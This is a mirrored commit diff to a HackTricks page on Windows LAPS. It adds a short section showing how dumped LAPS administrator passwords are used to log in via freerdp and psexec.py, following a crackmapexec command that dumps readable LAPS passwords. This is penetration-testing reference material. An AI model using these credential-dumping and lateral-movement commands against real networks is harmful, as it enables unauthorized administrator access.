mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
Update laps.md
This commit is contained in:
parent
153b61c0bc
commit
d86a0655ba
1 changed files with 9 additions and 0 deletions
|
@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
|
||||||
```
|
```
|
||||||
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
|
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
|
||||||
|
|
||||||
|
## ** Using LAPS Password **
|
||||||
|
```
|
||||||
|
freerdp /v:192.168.1.1:3389 /u:Administrator
|
||||||
|
Password: 2Z@Ae)7!{9#Cq
|
||||||
|
|
||||||
|
python psexec.py Administrator@web.example.com
|
||||||
|
Password: 2Z@Ae)7!{9#Cq
|
||||||
|
```
|
||||||
|
|
||||||
## **LAPS Persistence**
|
## **LAPS Persistence**
|
||||||
|
|
||||||
### **Expiration Date**
|
### **Expiration Date**
|
||||||
|
|
Loading…
Reference in a new issue